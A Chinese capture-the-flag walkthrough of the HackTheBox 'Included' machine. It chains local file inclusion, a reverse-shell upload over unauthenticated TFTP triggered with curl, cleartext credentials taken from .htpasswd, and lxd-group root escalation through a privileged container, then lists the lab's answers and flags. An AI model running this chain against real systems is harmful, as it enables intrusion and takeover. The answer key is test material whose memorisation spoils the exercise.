七天啊
七天啊

HackTheBox-Starting Point--Tier 2---Included

文章目录

  • 一 Included 测试过程
    • 1.1 打点
    • 1.2 横向移动
    • 1.3 权限提升
  • 二 题目

一 Included 测试过程

1.1 打点

  1.端口扫描

nmap -sV -sC 10.129.193.21

HackTheBox-Starting Point--Tier 2---Included_第1张图片

  2.访问web站点

HackTheBox-Starting Point--Tier 2---Included_第2张图片

  3.文件包含漏洞探测

  观察请求地址:http://10.129.193.21/?file=home.php,利用file参数动态加载文件,尝试进行文件包含漏洞探测。

  服务器操作系统是ubuntu,尝试包含/etc/passwd文件,成功访问/etc/passwd

HackTheBox-Starting Point--Tier 2---Included_第3张图片

  4.TFTP利用

  在包含/etc/passwd文件后,发现存在mike、tftp用户。

  TFTP (Trivial File Transfer Protocol)是一种简单的协议,提供基本的文件传输功能,不需要用户身份验证。TFTP使用用户数据报协议(UDP)进行通信,适用于不需要文件传输协议(FTP)提供的复杂交互的应用程序。
  通过上述描述可知:TFTP运行在UDP端口上,并且不需要身份验证。

  TFTP服务器已经连接上,可以上传下载文件,此时可以通过TFTP服务器上传一个反弹shell,使用文件包含漏洞执行shell。

# 使用TFTP连接工具
tftp 10.129.193.21
put  reverse-shell.php

在这里插入图片描述

  5.利用文件包含反弹shell

# 开启监听
ncat -nvlp 1234

  文件包含执行reverse-shell.php文件,TFTP文件路径在之前读取/etc/passwd的时候已经发现:/var/lib/tftpboot

在这里插入图片描述

# 利用文件包含执行reverse-php.shell
curl "http://10.129.193.21/?file=/var/lib/tftpboot/reverse-shell.php"

在这里插入图片描述

HackTheBox-Starting Point--Tier 2---Included_第4张图片

# 获取交互式shell
python3 -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

  6.UDP端口扫描

UDP扫描需要root权限
sudo nmap -sU 10.129.193.21

HackTheBox-Starting Point--Tier 2---Included_第5张图片

1.2 横向移动

  1.在/var/www/html文件夹下查找mike用户相关信息

在这里插入图片描述

cd /etc/passwd
ls -la

HackTheBox-Starting Point--Tier 2---Included_第6张图片

  2.读取.htpasswd文件

# 发现mike用户账号和密码:mike:Sheffield19
cat .htpasswd

在这里插入图片描述

  3.切换到mike用户

su mike
Sheffield19

HackTheBox-Starting Point--Tier 2---Included_第7张图片

HackTheBox-Starting Point--Tier 2---Included_第8张图片

1.3 权限提升

  1.使用 id 命令显示mike用户身份信息

在这里插入图片描述

  LXD解析:

  LXD是一个管理API,用于在Linux系统上处理LXC容器。它将为本地lxd组的任何成员执行任务。 LXD 是一个根进程,它对任何对 LXD UNIX 套接字具有写入权限的人执行操作。它通常不会尝试匹配调用用户的权限。本地“lxd”组的成员可以立即将权限提升到主机操作系统上的 root 权限。这与该用户是否被授予 sudo 权限无关,并且不需要他们输入密码。即使使用 LXD snap 软件包,该漏洞也存在。

  2.LXD权限提升

  1 下载 lxd-alpine-builder.git 

git clone  https://github.com/saghul/lxd-alpine-builder.git

  2 开启http server 

python3 -m http.server 8000

  3 将 alpine.tar.gz 上传至/tmp目录
HackTheBox-Starting Point--Tier 2---Included_第9张图片

  4.将alpine镜像导入lxd,并验证导入是否成功

lxc image import ./alpine.tar.xz  --alias Alpine
lxc image list

HackTheBox-Starting Point--Tier 2---Included_第10张图片

  5.将目标主机的根目录挂载到镜像里的/mnt/root目录下

lxc init Alpine privesc -c security.privileged=true
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true

HackTheBox-Starting Point--Tier 2---Included_第11张图片

  6.启动pricesc,并从中启动一个shell

lxc start privesc
lxc exec privesc /bin/sh

HackTheBox-Starting Point--Tier 2---Included_第12张图片

  查看root flag

HackTheBox-Starting Point--Tier 2---Included_第13张图片

二 题目

Tags

PHP、Web、Network、Custom Applications、Protocols、Apache、TFTP、LXD、Reconnaissance、Local File Inclusion、Clear Text Credentials、Arbitrary File Upload

译文:PHP、Web、网络、自定义应用程序、协议、Apache、TFTP、LXD、侦察、本地文件包含、明文凭据、任意文件上传

Connect

To attack the target machine, you must be on the same network.Connect to the Starting Point VPN using one of the following options.
It may take a minute for HTB to recognize your connection.If you don't see an update after 2-3 minutes, refresh the page.

译文:要攻击目标机器,您必须位于同一网络上。使用以下选项之一连接到起点 VPN。
HTB 可能需要一分钟才能识别您的连接。如果 2-3 分钟后没有看到更新,请刷新页面。

SPAWN MACHINE

Spawn the target machine and the IP will show here.

译文:生成目标机器,IP 将显示在此处

TASK 1

What service is running on the target machine over UDP?

译文:目标计算机上通过 UDP 运行什么服务?

答:tftp

TASK 2

What class of vulnerability is the webpage that is hosted on port 80 vulnerable to?

译文:端口 80 上托管的网页容易受到哪一类漏洞的攻击?

答:Local File Inclusion

TASK 3

What is the default system folder that TFTP uses to store files?

译文:TFTP 用于存储文件的默认系统文件夹是什么?

答:/var/lib/tftpboot/

TASK 4

Which interesting file is located in the web server folder and can be used for Lateral Movement?

译文:哪个有趣的文件位于 Web 服务器文件夹中,可用于横向移动?

答:.htpasswd

TASK 5

What is the group that user Mike is a part of and can be exploited for Privilege Escalation?

译文:用户 Mike 所属的组是什么,可以被用于权限提升?

答:lxd

TASK 6

When using an image to exploit a system via containers, we look for a very small distribution. Our favorite for this task is named after mountains. What is that distribution name?

译文:当使用映像通过容器利用系统时,我们会寻找一个非常小的分布。我们最喜欢的这项任务是以山脉命名的。该发行版名称是什么?

答:Alpine

TASK 7

What flag do we set to the container so that it has root privileges on the host system?

译文:我们为容器设置了什么标志,以便它在主机系统上具有 root 权限?

答:security.privileged=true

TASK 8

If the root filesystem is mounted at /mnt in the container, where can the root flag be found on the container after the host system is mounted?

译文:如果根文件系统挂载在容器的 /mnt 中,那么挂载主机系统后,在容器上的什么位置可以找到根标志?

答:/mnt/root/

SUBMIT FLAG

Submit user flag

译文:用户flag

答:a56ef91d70cfbf2cdb8f454c006935a1

SUBMIT FLAG

Submit root flag

译文:提交root flag

答:c693d9c7499d9f572ee375d4c14c7bcf

你可能感兴趣的:(靶场集合,#,HACK,THE,BOX,Hack,The,Box,文件包含,TFTP,LXD提权)

  • python 推导式(派生、衍生) sanduo112 人工智能pythonwindows开发语言
    python推导式一、推导式(派生、衍生)1.Python推导式是一种独特的数据处理方式,可以从一个数据序列构建另一个新的数据序列的结构体。2.列表(list)推导式3.字典(dict)推导式4.集合(set)推导式5.元组(tuple)推导式二、代码概述一、推导式(派生、衍生)1.Python推导式是一种独特的数据处理方式,可以从一个数据序列构建另一个新的数据序列的结构体。Python支持各种数
  • C#中的PLINQ和LINQ的效率对比 搬砖的诗人Z C#c#linq开发语言
    PLINQ(ParallelLINQ)和LINQ(LanguageIntegratedQuery)都是.NET框架中的功能,用于对集合进行查询和操作。它们之间的主要区别在于并行处理能力。LINQ:LINQ是一种用于在.NET应用程序中进行数据查询和操作的语言集成功能。它提供了一种统一的方式来查询各种数据源,如集合、数组、XML、数据库等。LINQ是在单线程环境中执行查询操作的,因此对于大型数据集或
  • Ai插件脚本合集安装包,免费教程视频网盘分享 全网优惠分享君
    随着人工智能技术的不断发展,越来越多的插件脚本涌现出来,为我们的生活和工作带来了便利。然而,如何快速、方便地获取和使用这些插件脚本呢?今天,我将为大家分享一个非常实用的资源——AI插件脚本合集安装包,以及免费教程视频网盘分享。首先,让我们来了解一下这个AI插件脚本合集安装包。它是一个集合了众多AI插件脚本的资源包,涵盖了各种领域,如数据分析、自动化办公、智能客服等等。通过这个安装包,用户可以轻松地
  • 搜索,动态规划,二叉树的时间复杂度计算通用公式 鸭蛋蛋_8441
    搜索的时间复杂度:O(答案总数*构造每个答案的时间)举例:Subsets问题,求所有的子集。子集个数一共2^n,每个集合的平均长度是O(n)的,所以时间复杂度为O(n*2^n),同理Permutations问题的时间复杂度为:O(n*n!)动态规划的时间复杂度:O(状态总数*计算每个状态的时间复杂度)举例:triangle,数字三角形的最短路径,状态总数约O(n^2)个,计算每个状态的时间复杂度为
  • 微信小程序修改checkbox和radio的样式 叶落无痕123 微信小程序小程序
    我们在开发小程序的时候,有时候需要修改小程序中checkbox和radio的原生样式,如何修改呢?这里给大家提供了一份代码,大家可以试试。首先是修改checkbox样式的代码:/*重写checkbox样式*//*未选中的背景样式*/checkbox.wx-checkbox-input{border-radius:50%;/*圆角*/width:40rpx;/*背景的宽*/height:40rpx;
  • 计算机网络知识点汇总 蓝小俊
    第1章概述P36习题3、7、14、15、17、22、24、262.“协议”与“服务”的异同点?答:(1)协议是控制两个对等实体进行通信的规则的集合。在协议的控制下,两个对等实体间的通信使得本层能够向上一层提供服务,而要实现本层协议,还需要使用下面一层提供服务。(2)协议和服务的概念的区分:1、协议的实现保证了能够向上一层提供服务。本层的服务用户只能看见服务而无法看见下面的协议。下面的协议对上面的服
  • Java学习笔记01 .wsy. 日常java学习笔记
    1.1Java简介Java的前身是Oak,詹姆斯·高斯林是java之父。1.2Java体系Java是一种与平台无关的语言,其源代码可以被编译成一种结构中立的中间文件(.class,字节码文件)于Java虚拟机上运行。1.2.3专有名词JDK提供编译、运行Java程序所需要的种种工具及资源。JRE是运行Java所依赖的环境的集合。JVM是一个虚构出来的计算机,通过在实际的计算机上仿真模拟各种计算机功
  • Python极速入门:五分钟开启实战之旅! 知白守黑V Python编程语言系统运维python编程语言python开发python学习python入门python数据分析
    1.Python基础语法和结构:了解Python的基本语法,包括变量、数据类型、运算符、注释等。控制流:掌握条件语句(if-elif-else)、循环(for和while)及其控制(break和continue)。函数:学习如何定义和使用函数,包括参数传递、返回值、作用域和闭包。模块和包:理解如何导入和使用模块,以及如何创建和使用自己的包。2.数据处理列表、元组和集合:学习这些序列类型的操作和方法
  • 计算机常用端口号 王依硕 linux服务器ssh
    ftp:(20端口)用于ftp服务,用于数据传输。ftp:(21端口)用于文件上传和下载。ssh:(22端口)用于安全Shell访问和文件传输。telnet:(23端口)用于远程命令行计算机管理。smtp:(25端口)用于发送电子邮件。dns:(53端口)用于域名解析。dhcp:(67和68端口)用于动态分配IP地址和配置网络参数。tftp:(69端口)使用udp连接。finger:(79端口)是
  • 通俗易懂:描述MySQL中SET和ENUM数据类型的异同。 大龄下岗程序员 mysqljavamysqlspring
    MySQL中的SET和ENUM数据类型均用于限制字段可接受的值范围,但它们的设计用途和功能特性有所不同:SET类型-SET是一种集合类型,它可以存储一组预定义的离散值,并且在一个SET字段中可以同时存储多个值。-SET字段内的值是互斥的,即同一时间不会存在相同的元素两次,但可以有多个不同的元素组合。-值之间的分隔通常用逗号(,)或其他指定字符。-SET类型的字段最大可以容纳64个不同的成员值。-在
  • PyQt按钮点击触发事件 fightingwy python
    pyqt首先需要安装pyqt安装包我这边是pyqt5的安装包然后通过Qcheckbox创建关联窗口的checkbox,通过按钮绑定事件触发事件。btn.clicked.connect(self.push)btn1.clicked.connect(self.select_all)btn2.clicked.connect(self.select_none)btn=QPushButton(name,se
  • Swift 中的 Sequence 是什么 ? 依旧风轻 Swift才是未来swift开发语言iossequence
    在Swift中,Sequence是一个协议,它表示一个可以遍历其元素的集合类型。任何遵循Sequence协议的类型都必须提供一个迭代器,用于按顺序访问其元素。迭代器是通过makeIterator()方法获取的,该方法返回一个遵循IteratorProtocol的对象。Sequence协议本身并不要求集合是可变的或具有索引,它只关注遍历能力。这意味着你可以遍历一个序列的元素,但不一定能够修改它们或通
  • npm 常用命令详解 马卫斌 前端工程师 npm
    npm(NodePackageManager)是Node.js的包管理器,它允许用户方便地安装、共享和管理Node.js项目中的依赖。以下是一些npm常用命令的详解:1.查看npm版本npm-v这个命令用于查看本地已安装的npm版本。2.初始化项目npminit运行这个命令会引导你创建一个package.json文件,该文件包含了项目的元数据,如名称、版本、描述、作者等信息以及项目的依赖配置。若要
  • java-PDF与图片互转(pdfbox)[添加批注后合成pdf] Jayin_chan 开发中碰到的问题pdfboxpdf转图片java
    importjava.awt.image.BufferedImage;importjava.io.File;importjava.io.FileOutputStream;importjava.io.IOException;importjava.util.Date;importjava.util.Iterator;importjava.util.List;importjava.util.TreeSe
  • C#杨辉三角形 wenchm c#算法数据结构
    目录1.杨辉三角形定义2.用数组实现10层的杨辉三角形3.使用List泛型链表集合设计10层的杨辉三角形(1)代码解释:(2)算法中求余的作用4.使用List泛型链表集合设计10层的等腰的杨辉三角形1.杨辉三角形定义杨辉三角是一个由数字排列成的三角形数表,其最本质的特征是它的两条边都是由数字1组成的,而其余的数则等于它上方的两个数之和。杨辉三角有两种常用的表示形式。2.用数组实现10层的杨辉三角形
  • c#IQueryable和IEnumberable的区别 彭小彭~ c#基础c#
    IQueryable和IEnumerable是C#中处理集合的两个重要接口,常用于LINQ查询。它们有一些关键区别,适用于不同的场景:1.执行查询的位置IEnumerable:当你对一个IEnumerable序列使用LINQ操作时,这些操作是在本地内存中执行的。如果IEnumerable表示数据库中的数据(例如,使用EntityFramework时),那么整个数据集首先会被加载到内存中,然后再应用
  • 【Vue】elementUI-MessageBox组件相关 SZnA1 vue.jselementui前端
    官方代码:点击打开MessageBoxexportdefault{methods:{open(){this.$confirm('此操作将永久删除该文件,是否继续?','提示',{confirmButtonText:'确定',cancelButtonText:'取消',type:'warning'}).then(()=>{this.$message({type:'success',message:'
  • 早安,日更第一天 乖乖的徐二二
    今天是加入日更第一天,我的girl也从昨天开始早上晨跑,和表姐一起。感觉一切美好都井然有序的发生着呢,昨天我的网易云音乐电台成功开通了,用的一个作品是我自己写的歌词,成品出来还是蛮一般的但是我还是留下了它,毕竟那是我最初的脚步。昨晚更新了电台,简单介绍了一下我第一首作品,后来听自己的话,还是蛮逗的,最后结尾给大家打了2b8b16b的B-box就说晚安了,虽然只有两个人订阅了我的电台,也要对自己,对
  • 认识Java语言(二) 小魏冬琅 python算法java
    3.1数组概述在编程世界中,我们往往需要处理多个相同类型的数据。例如,我们可能需要处理一整个班级的学生的分数,或者一个集团公司所有员工的工资。在这种情况下,使用单独的变量会很麻烦,因为我们需要为每个学生或员工创建一个变量。为了解决这个问题,我们可以使用数组。数组是一种存储多个相同类型数据的集合。在Java语言中,数组是一种特殊的对象,可以存储固定数量的同类型的元素。3.2一维数组3.2.1一维数组
  • Redis基础命令集详解——新手入门必备 Jz_Stu Redisredis
    Redis基础命令集详解——新手入门必备文章目录Redis基础命令集详解——新手入门必备前言一、Redis安装与连接二、Redis数据类型及基本命令1、String(字符串)2、List(列表)可模拟双向列表(左进右出|右进左出)和栈(左进左出|右进右出)3、Set(集合)4、Hash(哈希)5、SortedSet(有序集合)6、其他功能性命令三、事务与批量操作总结前言Redis(RemoteDi
  • LeetCode hot100-14 Aloha_up leetcodeleetcode算法职场和发展
    56.合并区间以数组intervals表示若干个区间的集合,其中单个区间为intervals[i]=[starti,endi]。请你合并所有重叠的区间,并返回一个不重叠的区间数组,该数组需恰好覆盖输入中的所有区间。这道题也没什么思路,看了提示做出来的,但是还是超时了,能过167/170的案例。把排序那改成更快的排序应该就不会超时。官方解法的代码写得有一种Java水平过高,明显不是我能写出的代码的感
  • ios 图片加载内存尺寸_iOS图片内存优化 weixin_39606244 ios图片加载内存尺寸
    基于现在iOS11新生成的图片都是HEIF,该图片使用UIImage(named:name)已不在那么优雅,图片大小为1.8m大小的,读进手机内存,直接飙升了45M,这是我们不想看到的结果,一个页面有多个这样子的图的话,恐怕就是灾难了。既然原图不能读入,那么如何可以用更少的内存和CPU来解决呢?这就要先了解该图片的编码了。HEICHEIF带有元数据的HEIF的另一种形式。HEIC文件包含一个或多个
  • Python高级语法 *愿风载尘* Python极速入门python开发语言
    Python高级语1列表推导式1.1什么是列表推导式1.2列表推导式的使用2字典推导式2.1什么是字典推导式2.2字典推导式的使用3元组推导式4集合推导式5三元表达式5.1什么是三元表达式5.2三元表达式的使用1列表推导式1.1什么是列表推导式列表推导式的英文(listcmprehension)是Python独有的一种语法结构,它将推导式(又称解析式)得到的各个结果组成一个新个列表,是一种非常简洁
  • WPF —— ListBox控件、GroupBox控件详解 不爱敲代码的小璐 wpf
    1、ListBox介绍ListBox是一个ItemsControl,这意味着它可以包含任何类型的对象的集合(,例如字符串、图像或面板)。一个ListBox中的多个项是可见的,与仅ComboBox具有所选项可见的项不同,除非IsDropDownOpen属性为true。该SelectionMode属性确定一次是否可以选择多个项ListBox。2常用的属性ItemTemplate子项模版标签DataTe
  • 软通动力华为java机考题库_软通动力Java考试题库.doc 假行酥 软通动力华为java机考题库
    软通动力Java考试题库.doc软通动力培训课程题库Java编号:ISS-TJ-TC版本:1.0作者:JavaSE基础康佳琪日期作者:JavaEE高级张建军日期:审批人:张林福日期:目录JavaSE基础部分Java基础Java面向对象Java异常Java集合框架J2EE中,下列不属于集合类的是()。(选择一项)CVectorStackEnumerationHashtable2)在J2EE中,下列元
  • 设计模式学习笔记 - 规范与重构 - 8.实践:程序出错返回啥?NULL、异常、错误吗、空对象?重构ID生成器,处理各函数的异常 陈建111 设计模式-实战程序出错时返回内容
    概述我们可以把函数的运行结果分为两类。一类是预期结果,也就是正常情况下输出的结果。一类是非预期的结果,也就是函数在异常(或出错)情况下输出的结果。在正常情况下,函数返回数据的类型非常明确,但是在异常情况下,函数的返回数据类型确非常灵活,有多种选择,比如异常(Exception)、错误码、NULL值、特殊值(比如-1)、空对象(比如空字符串、空集合)等。在异常情况下,函数到底该返回什么样的数据类型,
  • Animal Farm(109) 云手a
    ForthenexttwodaysBoxerremainedinhisstall.Thepigshadsentoutalargebottleofpinkmedicinewhichtheyhadfoundinthemedicinechestinthebathroom,andCloveradministered【vt.管理;执行;给予】ittoBoxertwiceadayaftermeals.Inth
  • 一线大厂面试真题——Collection 和 Collections 有什么区别 似来 Java基础面试题面试职场和发展java开发语言
    (1)Collection是最基本的集合接口,Collection派生了两个子接口list和set,分别定义了两种不同的存储方式。(2)Collections是一个包装类,它包含各种有关集合操作的静态方法(对集合的搜索、排序、线程安全化等)。此类不能实例化,就像一个工具类,服务于Collection框架。
  • Python内置函数map、split、join讲解 吹吹晚风- Python基础python开发语言
    一、map函数map()函数是Python内置函数之一,用于对可迭代对象(如列表、元组等)中的每个元素应用指定的函数,并返回一个包含结果的迭代器。map()函数的语法如下:map(function,iterable)其中,function是一个函数,可以是内置函数、自定义函数或使用lambda表达式定义的匿名函数。iterable是一个可迭代对象,如列表、元组、集合等。map()函数的工作原理如下
  • Redis常见问题 爱码的嘉 Redisredis数据库缓存
    1、什么是redis?Redis是C语言开发的一个开源的高性能键值对(key-value)的内存数据库,可以用作数据库、缓存、消息中间件等。它是一种NoSQL的数据库。性能优秀,数据在内存中,读写速度非常快,支持并发10WQPS。单进程单线程,是线程安全的,采用IO多路复用机制。丰富的数据类型,支持字符串、散列、列表、集合、有序集合等。支持数据持久化。可以将内存中数据保存在磁盘中,重启时加载。主从
  • sql统计相同项个数并按名次显示 朱辉辉33 javaoracle
    现在有如下这样一个表: A表 ID Name time ------------------------------ 0001 aaa 2006-11-18 0002 ccc 2006-11-18 0003 eee 2006-11-18 0004 aaa 2006-11-18 0005 eee 2006-11-18 0004 aaa 2006-11-18 0002 ccc 20
  • Android+Jquery Mobile学习系列-目录 白糖_ JQuery Mobile
    最近在研究学习基于Android的移动应用开发,准备给家里人做一个应用程序用用。向公司手机移动团队咨询了下,觉得使用Android的WebView上手最快,因为WebView等于是一个内置浏览器,可以基于html页面开发,不用去学习Android自带的七七八八的控件。然后加上Jquery mobile的样式渲染和事件等,就能非常方便的做动态应用了。   从现在起,往后一段时间,我打算
  • 如何给线程池命名 daysinsun 线程池
            在系统运行后,在线程快照里总是看到线程池的名字为pool-xx,这样导致很不好定位,怎么给线程池一个有意义的名字呢。参照ThreadPoolExecutor类的ThreadFactory,自己实现ThreadFactory接口,重写newThread方法即可。参考代码如下:     public class Named
  • IE 中"HTML Parsing Error:Unable to modify the parent container element before the 周凡杨 html解析errorreadyState
      错误: IE 中"HTML Parsing Error:Unable to modify the parent container element before the child element is closed"     现象: 同事之间几个IE 测试情况下,有的报这个错,有的不报。经查询资料后,可归纳以下原因。
  • java上传 g21121 java
    我们在做web项目中通常会遇到上传文件的情况,用struts等框架的会直接用的自带的标签和组件,今天说的是利用servlet来完成上传。 我们这里利用到commons-fileupload组件,相关jar包可以取apache官网下载:http://commons.apache.org/ 下面是servlet的代码: //定义一个磁盘文件工厂 DiskFileItemFactory fact
  • SpringMVC配置学习 510888780 springmvc
    spring MVC配置详解 现在主流的Web MVC框架除了Struts这个主力 外,其次就是Spring MVC了,因此这也是作为一名程序员需要掌握的主流框架,框架选择多了,应对多变的需求和业务时,可实行的方案自然就多了。不过要想灵活运用Spring MVC来应对大多数的Web开发,就必须要掌握它的配置及原理。   一、Spring MVC环境搭建:(Spring 2.5.6 + Hi
  • spring mvc-jfreeChart 柱图(1) 布衣凌宇 jfreechart
    第一步:下载jfreeChart包,注意是jfreeChart文件lib目录下的,jcommon-1.0.23.jar和jfreechart-1.0.19.jar两个包即可; 第二步:配置web.xml; web.xml代码如下 <servlet>     <servlet-name>jfreechart</servlet-nam
  • 我的spring学习笔记13-容器扩展点之PropertyPlaceholderConfigurer aijuans Spring3
    PropertyPlaceholderConfigurer是个bean工厂后置处理器的实现,也就是BeanFactoryPostProcessor接口的一个实现。关于BeanFactoryPostProcessor和BeanPostProcessor类似。我会在其他地方介绍。PropertyPlaceholderConfigurer可以将上下文(配置文件)中的属性值放在另一个单独的标准java P
  • java 线程池使用 Runnable&Callable&Future antlove javathreadRunnablecallablefuture
    1. 创建线程池 ExecutorService executorService = Executors.newCachedThreadPool();   2. 执行一次线程,调用Runnable接口实现 Future<?> future = executorService.submit(new DefaultRunnable()); System.out.prin
  • XML语法元素结构的总结 百合不是茶 xml树结构
    1.XML介绍1969年   gml (主要目的是要在不同的机器进行通信的数据规范)1985年   sgml  standard generralized markup language1993年   html(www网)1998年  xml   extensible markup language
  • 改变eclipse编码格式 bijian1013 eclipse编码格式
    1.改变整个工作空间的编码格式         改变整个工作空间的编码格式,这样以后新建的文件也是新设置的编码格式。         Eclipse->window->preferences->General->workspace-
  • javascript中return的设计缺陷 bijian1013 JavaScriptAngularJS
    代码1: <script> var gisService = (function(window) { return { name:function () { alert(1); } }; })(this); gisService.name(); &l
  • 【持久化框架MyBatis3八】Spring集成MyBatis3 bit1129 Mybatis3
    pom.xml配置 Maven的pom中主要包括: MyBatis MyBatis-Spring Spring MySQL-Connector-Java Druid applicationContext.xml配置   <?xml version="1.0" encoding="UTF-8"?> &
  • java web项目启动时自动加载自定义properties文件 bitray javaWeb监听器相对路径
    创建一个类 public class ContextInitListener implements ServletContextListener 使得该类成为一个监听器。用于监听整个容器生命周期的,主要是初始化和销毁的。 类创建后要在web.xml配置文件中增加一个简单的监听器配置,即刚才我们定义的类。 <listener> <des
  • 用nginx区分文件大小做出不同响应 ronin47
    昨晚和前21v的同事聊天,说到我离职后一些技术上的更新。其中有个给某大客户(游戏下载类)的特殊需求设计,因为文件大小差距很大——估计是大版本和补丁的区别——又走的是同一个域名,而squid在响应比较大的文件时,尤其是初次下载的时候,性能比较差,所以拆成两组服务器,squid服务于较小的文件,通过pull方式从peer层获取,nginx服务于较大的文件,通过push方式由peer层分发同步。外部发布
  • java-67-扑克牌的顺子.从扑克牌中随机抽5张牌,判断是不是一个顺子,即这5张牌是不是连续的.2-10为数字本身,A为1,J为11,Q为12,K为13,而大 bylijinnan java
    package com.ljn.base; import java.util.Arrays; import java.util.Random; public class ContinuousPoker { /** * Q67 扑克牌的顺子 从扑克牌中随机抽5张牌,判断是不是一个顺子,即这5张牌是不是连续的。 * 2-10为数字本身,A为1,J为1
  • 翟鸿燊老师语录 ccii 翟鸿燊
    一、国学应用智慧TAT之亮剑精神A 1. 角色就是人格     就像你一回家的时候,你一进屋里面,你已经是儿子,是姑娘啦,给老爸老妈倒怀水吧,你还觉得你是老总呢?还拿派呢?就像今天一样,你们往这儿一坐,你们之间是什么,同学,是朋友。     还有下属最忌讳的就是领导向他询问情况的时候,什么我不知道,我不清楚,该你知道的你凭什么不知道
  • [光速与宇宙]进行光速飞行的一些问题 comsci 问题
         在人类整体进入宇宙时代,即将开展深空宇宙探索之前,我有几个猜想想告诉大家     仅仅是猜想。。。未经官方证实      1:要在宇宙中进行光速飞行,必须首先获得宇宙中的航行通行证,而这个航行通行证并不是我们平常认为的那种带钢印的证书,是什么呢? 下面我来告诉
  • oracle undo解析 cwqcwqmax9 oracle
    oracle undo解析2012-09-24 09:02:01     我来说两句       作者:虫师收藏    我要投稿 Undo是干嘛用的?         &nb
  • java中各种集合的详细介绍 dashuaifu java集合
    一,java中各种集合的关系图 Collection       接口的接口     对象的集合  ├ List           子接口   &n
  • 卸载windows服务的方法 dcj3sjt126com windowsservice
    卸载Windows服务的方法 在Windows中,有一类程序称为服务,在操作系统内核加载完成后就开始加载。这里程序往往运行在操作系统的底层,因此资源占用比较大、执行效率比较高,比较有代表性的就是杀毒软件。但是一旦因为特殊原因不能正确卸载这些程序了,其加载在Windows内的服务就不容易删除了。即便是删除注册表中的相 应项目,虽然不启动了,但是系统中仍然存在此项服务,只是没有加载而已。如果安装其他
  • Warning: The Copy Bundle Resources build phase contains this target's Info.plist dcj3sjt126com iosxcode
        http://developer.apple.com/iphone/library/qa/qa2009/qa1649.html Excerpt: You are getting this warning because you probably added your Info.plist file to your Copy Bundle
  • 2014之C++学习笔记(一) Etwo C++EtwoEtwoiterator迭代器
            已经有很长一段时间没有写博客了,可能大家已经淡忘了Etwo这个人的存在,这一年多以来,本人从事了AS的相关开发工作,但最近一段时间,AS在天朝的没落,相信有很多码农也都清楚,现在的页游基本上达到饱和,手机上的游戏基本被unity3D与cocos占据,AS基本没有容身之处。so。。。最近我并不打算直接转型
  • js跨越获取数据问题记录 haifengwuch jsonpjsonAjax
    js的跨越问题,普通的ajax无法获取服务器返回的值。   第一种解决方案,通过getson,后台配合方式,实现。 Java后台代码: protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException { String ca
  • 蓝色jQuery导航条 ini JavaScripthtmljqueryWebhtml5
    效果体验:http://keleyi.com/keleyi/phtml/jqtexiao/39.htmHTML文件代码: <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>jQuery鼠标悬停上下滑动导航条 - 柯乐义<
  • linux部署jdk,tomcat,mysql kerryg jdktomcatlinuxmysql
    1、安装java环境jdk:     一般系统都会默认自带的JDK,但是不太好用,都会卸载了,然后重新安装。    1.1)、卸载:      (rpm -qa :查询已经安装哪些软件包;        rmp -q 软件包:查询指定包是否已
  • DOMContentLoaded VS onload VS onreadystatechange mutongwu jqueryjs
    1. DOMContentLoaded 在页面html、script、style加载完毕即可触发,无需等待所有资源(image/iframe)加载完毕。(IE9+) 2. onload是最早支持的事件,要求所有资源加载完毕触发。 3. onreadystatechange 开始在IE引入,后来其它浏览器也有一定的实现。涉及以下 document , applet, embed, fra
  • sql批量插入数据 qifeifei 批量插入
    hi,   自己在做工程的时候,遇到批量插入数据的数据修复场景。我的思路是在插入前准备一个临时表,临时表的整理就看当时的选择条件了,临时表就是要插入的数据集,最后再批量插入到数据库中。    WITH tempT AS ( SELECT item_id AS combo_id, item_id, now() AS create_date FROM a
  • log4j打印日志文件 如何实现相对路径到 项目工程下 thinkfreer Weblog4j应用服务器日志
    最近为了实现统计一个网站的访问量,记录用户的登录信息,以方便站长实时了解自己网站的访问情况,选择了Apache 的log4j,但是在选择相对路径那块 卡主了,X度了好多方法(其实大多都是一样的内用,还一个字都不差的),都没有能解决问题,无奈搞了2天终于解决了,与大家分享一下 需求: 用户登录该网站时,把用户的登录名,ip,时间。统计到一个txt文档里,以方便其他系统调用此txt。项目名
  • linux下mysql-5.6.23.tar.gz安装与配置 笑我痴狂 mysqllinuxunix
    1.卸载系统默认的mysql [root@localhost ~]# rpm -qa | grep mysql mysql-libs-5.1.66-2.el6_3.x86_64 mysql-devel-5.1.66-2.el6_3.x86_64 mysql-5.1.66-2.el6_3.x86_64 [root@localhost ~]# rpm -e mysql-libs-5.1
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他